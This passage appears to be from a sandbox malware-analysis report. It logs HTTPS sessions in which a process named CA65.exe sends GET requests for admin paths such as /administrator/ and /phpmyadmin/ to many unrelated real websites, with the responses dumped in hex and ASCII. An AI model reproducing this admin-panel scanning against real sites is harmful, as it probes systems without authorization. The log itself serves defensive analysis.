2023-12-22 20:14:54 UTC	1252	IN	Data Raw: 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d Data Ascii: e=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <m
2023-12-22 20:14:54 UTC	1252	IN	Data Raw: 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 Data Ascii: ces/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0
2023-12-22 20:14:54 UTC	269	IN	Data Raw: 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c Data Ascii: ed</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	58606	209.124.80.122	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	173	OUT	GET /administrator/ HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	321	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:53 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:54 UTC	7871	IN	Data Raw: 33 64 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d Data Ascii: 3da4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><!-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	58451	34.136.28.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	828	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPpRG_pDHODz0wUyhYGsee455jaRFszTBPIs92eNNV_ez96RHMU806q5qdl6XeQJWTNz9Gc date: Fri, 22 Dec 2023 20:14:54 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:14:54 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:14:54 UTC	2888	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	58597	167.235.0.29	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	188	OUT	GET /administrator/ HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 34 3a 35 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:14:54 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:14:54 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	58545	20.197.30.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:53 UTC	176	OUT	GET //admin HTTP/1.1 Host: trivandrum.german.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:54 UTC	166	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	58797	3.33.130.190	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	388	OUT	GET /administrator/index.php HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://yandfcorp.com/administrator/
2023-12-22 20:14:54 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CDH4dyRwXkPGVphpsgkPmYPILLjX0B7HpssX7CA6pAU9V0o6K6ig4L+9kZn0tyP7cjoT4Au9rt4cJp8NwtUoQg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:54 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	58812	13.248.169.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	410	OUT	GET /administrator/index.php HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://customizedperformance.com/administrator/
2023-12-22 20:14:54 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_HbD+rWAwKvA85wRCScwR7LypJ5NuuV5/NvOSA6C/XEiMTF0oyfFEkwyJs9A5HC4loRp4dyxFPfwTsKUxw1XDPA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:54 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	58815	34.136.28.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	237	OUT	GET /administrator/index.php HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://ispsolucoes.com/administrator/
2023-12-22 20:14:54 UTC	835	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPqGCBSa6hvjTQCgHLLZG0s2cuPi3C1NXv9wUnYfPQvwLe2zuoYyD9B-CxhXKrGd1rzX6-TVcGfxhg date: Fri, 22 Dec 2023 20:14:54 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:14:54 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:14:54 UTC	2888	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	58858	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:54 UTC	327	OUT	GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip Cookie: site_version_phase=108; site_version=HDv3 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.hugedomains.com/domain_profile.cfm?d=yuejichem.com
2023-12-22 20:14:54 UTC	643	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bv69vVu4V4f8DfxG%2BVt1QMLx5AitEo%2BI2D%2FG6muCV7g%2FBaaCghHa%2F9tlYkxtC8q4jch6QsfYZu69F3kZ51SXOwml0O2Mwpa7rHXLp%2Fl7NonlcS1zIeqOeFayylENpkhU7NuKi78%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08a65f494964-MIA
2023-12-22 20:14:54 UTC	726	IN	Data Raw: 61 33 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 Data Ascii: a3d<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><met
2023-12-22 20:14:54 UTC	1369	IN	Data Raw: 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 68 64 2d 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 32 2d 31 30 2d 33 33 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: s/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/responsive.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/hd-style.css?aa=2022-10-33"><meta name
